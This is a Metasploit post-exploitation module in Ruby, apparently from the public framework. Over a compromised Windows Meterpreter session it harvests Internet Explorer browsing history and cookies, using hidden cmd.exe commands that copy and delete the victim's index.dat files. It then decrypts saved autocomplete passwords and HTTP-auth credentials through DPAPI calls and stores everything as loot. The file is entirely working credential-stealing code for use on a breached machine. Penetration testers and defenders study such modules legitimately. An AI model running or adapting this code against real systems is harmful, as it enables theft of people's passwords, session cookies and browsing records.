## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, 'Name' => "Windows Gather Internet Explorer User Data Enumeration", 'Description' => %q{ This module will collect history, cookies, and credentials (from either HTTP auth passwords, or saved form passwords found in auto-complete) in Internet Explorer. The ability to gather credentials is only supported for versions of IE >=7, while history and cookies can be extracted for all versions. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'] )) end # # RAILGUN HELPER FUNCTIONS # def is_86 pid = session.sys.process.open.pid return session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" end def pack_add(data) if is_86 addr = [data].pack("V") else addr = [data].pack("Q") end return addr end def mem_write(data, length) pid = session.sys.process.open.pid process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(length) process.memory.write(mem, data) return mem end def read_str(address,len,type) begin pid = session.sys.process.open.pid process = session.sys.process.open(pid, PROCESS_ALL_ACCESS) raw = process.memory.read(address, len) if type == 0 #unicode str_data = raw.gsub("\x00","") elsif type == 1 #null terminated str_data = raw.unpack("Z*")[0] elsif type == 2 #raw data str_data = raw end rescue str_data = nil end return str_data || "Error Decrypting" end # # DECRYPT FUNCTIONS # def decrypt_reg(entropy,data) c32 = session.railgun.crypt32 #set up entropy salt = [] entropy.each_byte do |c| salt << c end ent = salt.pack("s*") #save values to memory and pack addresses mem = mem_write(data, 1024) mem2 = mem_write(ent, 1024) addr = pack_add(mem) len = pack_add(data.length) eaddr = pack_add(mem2) elen = pack_add((entropy.length + 1)*2) #cal railgun to decrypt if is_86 ret = c32.CryptUnprotectData("#{len}#{addr}",16,"#{elen}#{eaddr}",nil,nil,1,8) len,add = ret["pDataOut"].unpack("V2") else ret = c32.CryptUnprotectData("#{len}#{addr}",16,"#{elen}#{eaddr}",nil,nil,1,16) len,add = ret["pDataOut"].unpack("Q2") end return "" unless ret["return"] return read_str(add, len, 2) end def decrypt_cred(daddr, dlen) c32 = session.railgun.crypt32 #set up entropy guid = "abe2869f-9b47-4cd9-a358-c22904dba7f7" ent_sz = 74 salt = [] guid.each_byte do |c| salt << c*4 end ent = salt.pack("s*") #write entropy to memory and pack addresses mem = mem_write(ent,1024) addr = pack_add(daddr) len = pack_add(dlen) eaddr = pack_add(mem) elen = pack_add(ent_sz) #prep vars and call function if is_86 ret = c32.CryptUnprotectData("#{len}#{addr}",16,"#{elen}#{eaddr}",nil,nil,0,8) len,add = ret["pDataOut"].unpack("V2") else ret = c32.CryptUnprotectData("#{len}#{addr}",16,"#{elen}#{eaddr}",nil,nil,0,16) len,add = ret["pDataOut"].unpack("Q2") end #get data, and return it return "" unless ret["return"] return read_str(add, len, 0) end # # Extract IE Data Functions # def get_stuff(path, history) t = DateTime.new(1601,1,1,0,0,0) tmpout = "" if history re = /\x55\x52\x4C\x20.{4}(.{8})(.{8}).*?\x56\x69\x73\x69\x74\x65\x64\x3A.*?\x40(.*?)\x00/m else #get cookies re = /\x55\x52\x4C\x20.{4}(.{8})(.{8}).*?\x43\x6F\x6F\x6B\x69\x65\x3A(.*?)\x00/m end outfile = session.fs.file.new(path, "rb") until outfile.eof? tmpout << outfile.read rescue nil end outfile.close urls = tmpout.scan(re) urls.each do |url| #date modified hist = {} origh = url[0].unpack('H*')[0] harr = origh.scan(/[0-9A-Fa-f]{2}/).map { |i| i.to_s} newh = harr.reverse.join hfloat = newh.hex.to_f sec = hfloat/10000000 days = sec/86400 timestamp = t + days hist["dtmod"] = timestamp.to_s #date accessed origh = url[1].unpack('H*')[0] harr = origh.scan(/[0-9A-Fa-f]{2}/).map { |i| i.to_s} newh = harr.reverse.join hfloat = newh.hex.to_f sec = hfloat/10000000 days = sec/86400 timestamp = t + days hist["dtacc"] = timestamp.to_s hist["url"] = url[2] if history @hist_col << hist @hist_table << [hist["dtmod"],hist["dtacc"],hist["url"]] else @cook_table << [hist["dtmod"],hist["dtacc"],hist["url"]] end end end def hash_url(url) rg_advapi = session.railgun.advapi32 tail = 0 prov = "Microsoft Enhanced Cryptographic Provider v1.0" flag = 0xF0000000 context = rg_advapi.CryptAcquireContextW(4, nil, prov, 1, 0xF0000000) h = rg_advapi.CryptCreateHash(context['phProv'], 32772, 0, 0, 4) hdata = rg_advapi.CryptHashData(h['phHash'], url, (url.length + 1)*2, 0) hparam = rg_advapi.CryptGetHashParam(h['phHash'], 2, 20, 20,0) hval_arr = hparam["pbData"].unpack("C*") hval = hparam["pbData"].unpack("H*")[0] rg_advapi.CryptDestroyHash(h['phHash']) rg_advapi.CryptReleaseContext(context['phProv'], 0) tail = hval_arr.inject(0) { |s,v| s += v } htail = ("%02x" % tail)[-2,2] return "#{hval}#{htail}" end def run #check for meterpreter and version of ie if session.type != "meterpreter" and session.platform !~ /win/ print_error("This module only works with Windows Meterpreter sessions") return 0 end #get version of ie and check it ver = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer", "Version") print_status("IE Version: #{ver}") if ver =~ /(6\.|5\.)/ print_error("This module will only extract credentials for >= IE7") end #setup tables @hist_table = Rex::Ui::Text::Table.new( "Header" => "History data", "Indent" => 1, "Columns" => ["Date Modified", "Date Accessed", "Url"]) @cook_table = Rex::Ui::Text::Table.new( "Header" => "Cookies data", "Indent" => 1, "Columns" => ["Date Modified", "Date Accessed", "Url"]) cred_table = Rex::Ui::Text::Table.new( "Header" => "Credential data", "Indent" => 1, "Columns" => ["Type", "Url", "User", "Pass"]) #set up vars rg = session.railgun host = session.sys.config.sysinfo @hist_col = [] #set paths regpath = "HKCU\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" vist_h = "\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" vist_hlow = "\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat" xp_h = "\\Local Settings\\History\\History.IE5\\index.dat" vist_c = "\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" vist_clow = "\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" xp_c = "\\Cookies\\index.dat" h_paths = [] c_paths = [] base = session.sys.config.getenv('USERPROFILE') if host['OS'] =~ /(Windows 7|2008|Vista)/ h_paths << base + vist_h h_paths << base + vist_hlow c_paths << base + vist_c c_paths << base + vist_clow else h_paths << base + xp_h c_paths << base + xp_c end #Get history and cookies print_status("Retrieving history.....") h_paths.each do |hpath| if session.fs.file.exists?(hpath) print_line("\tFile: #{hpath}") #copy file cmd = "cmd.exe /c type \"#{hpath}\" > \"#{base}\\index.dat\"" r = session.sys.process.execute(cmd, nil, {'Hidden' => true}) #loop until cmd is done #while session.sys.process.each_process.find { |i| i["pid"] == r.pid} #end sleep(1) #get stuff and delete get_stuff("#{base}\\index.dat", true) cmd = "cmd.exe /c del \"#{base}\\index.dat\"" session.sys.process.execute(cmd, nil, {'Hidden' => true}) end end print_status("Retrieving cookies.....") c_paths.each do |cpath| if session.fs.file.exists?(cpath) print_line("\tFile: #{cpath}") #copy file cmd = "cmd.exe /c type \"#{cpath}\" > \"#{base}\\index.dat\"" r = session.sys.process.execute(cmd, nil, {'Hidden' => true}) #loop until cmd is done #while session.sys.process.each_process.find { |i| i["pid"] == r.pid} #end sleep(1) #get stuff and delete get_stuff("#{base}\\index.dat", false) cmd = "cmd.exe /c del \"#{base}\\index.dat\"" session.sys.process.execute(cmd, nil, {'Hidden' => true}) end end #get autocomplete creds print_status("Looping through history to find autocomplete data....") val_arr = registry_enumvals(regpath) if val_arr @hist_col.each do |hitem| url = hitem["url"].split('?')[0].downcase hash = hash_url(url).upcase if val_arr.include?(hash) data = registry_getvaldata(regpath, hash) dec = decrypt_reg(url, data) # If CryptUnprotectData fails, decrypt_reg() will return "", and unpack() will end up # returning an array of nils. If this happens, we can cause an "undefined method # `+' for NilClass." when we try to calculate the offset, and this causes the module to die. next if dec.empty? #decode data and add to creds array header = dec.unpack("VVVVVV") offset = header[0] + header[1] #offset to start of data cnt = header[5]/2 # of username/password combinations secrets = dec[offset,dec.length-(offset + 1)].split("\x00\x00") for i in (0..cnt).step(2) cred = {} cred["type"] = "Auto Complete" cred["url"] = url cred["user"] = secrets[i].gsub("\x00","") cred["pass"] = secrets[i+1].gsub("\x00","") unless secrets[i+1].nil? cred_table << [cred["type"],cred["url"],cred["user"],cred["pass"]] end end end else print_error("No autocomplete entries found in registry") end #get creds from credential store print_status("Looking in the Credential Store for HTTP Authentication Creds...") #get data from credential store ret = rg.advapi32.CredEnumerateA(nil,0,4,4) p_to_arr = ret["Credentials"].unpack("V") arr_len = ret["Count"] * 4 if is_86 arr_len = ret["Count"] * 8 unless is_86 #read array of addresses as pointers to each structure raw = read_str(p_to_arr[0], arr_len,2) pcred_array = raw.unpack("V*") if is_86 pcred_array = raw.unpack("Q*") unless is_86 #loop through the addresses and read each credential structure pcred_array.each do |pcred| raw = read_str(pcred, 52,2) cred_struct = raw.unpack("VVVVQVVVVVVV") if is_86 cred_struct = raw.unpack("VVQQQQQVVQQQ") unless is_86 location = read_str(cred_struct[2],512, 1) if location.include? "Microsoft_WinInet" decrypted = decrypt_cred(cred_struct[6],cred_struct[5]) cred = {} cred["type"] = "Credential Store" cred["url"] = location.gsub("Microsoft_WinInet_", "") cred["user"] = decrypted.split(':')[0] || "No Data" cred["pass"] = decrypted.split(':')[1] || "No Data" cred_table << [cred["type"],cred["url"],cred["user"],cred["pass"]] end end #store data in loot if not @hist_table.rows.empty? print_status("Writing history to loot...") path = store_loot( 'ie.history', 'text/plain', session, @hist_table, 'ie_history.txt', 'Internet Explorer Browsing History') print_status("Data saved in: #{path}") end if not @cook_table.rows.empty? print_status("Writing cookies to loot...") path = store_loot( 'ie.cookies', 'text/plain', session, @cook_table, 'ie_cookies.txt', 'Internet Explorer Cookies') print_status("Data saved in: #{path}") end if not cred_table.rows.empty? print_status("Writing gathered credentials to loot...") path = store_loot( 'ie.user.creds', 'text/plain', session, cred_table, 'ie_creds.txt', 'Internet Explorer User Credentials') print_status("Data saved in: #{path}") #print creds print_line("") print_line(cred_table.to_s) end end end